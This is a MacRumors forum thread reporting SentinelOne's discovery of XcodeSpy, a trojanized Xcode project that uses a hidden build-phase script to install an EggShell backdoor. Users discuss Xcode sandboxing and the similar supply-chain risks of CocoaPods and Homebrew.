Become a MacRumors Supporter for $25/year with no ads, private forums, and more!

MacRumors

macrumors bot
Original poster
Apr 12, 2001
56,981
19,827


Developers need to look out for "XcodeSpy," a malicious Xcode project that installs a custom variant of the "EggShell" backdoor on a macOS computer, according to new research shared today by SentinelOne (via Ars Technica).

iu-2-1.jpeg

Xcode is software designed for developers who want to write apps for the iOS and macOS platforms, and the malicious project that's circulating mirrors TabBarInteraction, a legitimate open source project.

Developers who download the XcodeSpy project think they're getting TabBarInteraction, but the malware includes a hidden "run Script" executable that downloads and installs the EggShell open source back door that's able to spy on users through the microphone, camera, and keyboard as well as upload and download files.

Two variants of the custom EggShell attack were found to be uploaded in Japan, first in August and then in October, so this is an attack that's been out in the wild for some time.
We have thus far been unable to discover other samples of trojanized Xcode projects and cannot gauge the extent of this activity. However, the timeline from known samples and other indicators mentioned below suggest that other XcodeSpy projects may exist. By sharing details of this campaign, we hope to raise awareness of this attack vector and highlight the fact that developers are high-value targets for attackers.
SentinelOne says that all Apple Developers that use Xcode should exercise caution when using shared Xcode projects.

Article Link: Security Researchers Discover XcodeSpy Malware That Targets Developers
 
  • Sad
Reactions: amartinez1660

bsamcash

macrumors 65816
Jul 31, 2008
1,024
2,466
San Jose, CA
Why is it being called a Trojan when it has to be actively installed?

Edit: I'm an idiot. I misunderstood and didn't realize the malware was hidden. I thought individuals were purposefully installing it.
 
Last edited:
  • Like
Reactions: amartinez1660

hot-gril

macrumors 68000
Jul 11, 2020
1,924
1,964
Northern California, USA
Comes under the heading, be very careful about what you download.
Xcode does warn you when opening an xcodeproj downloaded from the Internet, but given how frequently you legitimately have to open and build random projects, I wish there were better sandboxing. The "run script" phase runs arbitrary code, ofc necessary when building many things but also an attack vector.

Edit: And even if you're not manually opening/building projects, you're probably using Cocoapods, which is. Of course other dev platforms have similar risks.
 
Last edited:

Unsupported

macrumors 6502a
Jul 23, 2020
658
707
a land far, far away...
Why is it being called a Trojan when it has to be actively installed?

A Trojan horse or Trojan is a type of malware that is often disguised as legitimate software. Trojans can be employed by cyber-thieves and hackers trying to gain access to users' systems. Users are typically tricked by some form of social engineering into loading and executing Trojans on their systems. Once activated, Trojans can enable cyber-criminals to spy on you, steal your sensitive data, and gain backdoor access to your system. These actions can include:

•Deleting data
•Blocking data
•Modifying data
•Copying data
•Disrupting the performance of computers or computer networks


Modifying data?

So it could infect the project that the developer is working on?

Nasty!
 

amartinez1660

macrumors 65816
Sep 22, 2014
1,304
1,210
Xcode does warn you when opening an xcodeproj downloaded from the Internet, but given how frequently you legitimately have to open and build random projects, I wish there were better sandboxing. The "run script" phase runs arbitrary code, ofc necessary when building many things but also an attack vector.

Edit: And even if you're not manually opening/building projects, you're probably using Cocoapods, which is. Of course other dev platforms have similar risks.
I don’t know too much about this since I don’t program directly in xcode. You mean like importing a cocoa pods library could come with something that had the malware run the install script anyways? The spreading must be going at crazy rates actually.

Could something like “brew install xxxxx” also spread it?
 

Suckfest 9001

Suspended
May 31, 2015
1,748
2,482
Canada
I have many computers of all types in the house, Mac and Windows. Only virus I ever gotten was on my Mac.

Turns out it was security by obscurity after all.
 
  • Disagree
Reactions: mhnd

hot-gril

macrumors 68000
Jul 11, 2020
1,924
1,964
Northern California, USA
I don’t know too much about this since I don’t program directly in xcode. You mean like importing a cocoa pods library could come with something that had the malware run the install script anyways? The spreading must be going at crazy rates actually.

Could something like “brew install xxxxx” also spread it?
Not 100% sure about Cocoapods supporting build scripts until I try it myself, but I'd be very surprised if it didn't. Someone please correct me if I'm wrong.

`brew install`, yep. I mean you're running arbitrary code with user-level permissions and no sandboxing. Nothing guarantees that it does what the label says. The default package lists are somewhat curated to avoid malware, but you can `brew tap` whatever you want. This is part of why Homebrew refuses to run as root, but I disagree with that choice, and so do other package managers.
 
  • Like
Reactions: amartinez1660
Register on MacRumors! This sidebar will go away, and you'll see fewer ads.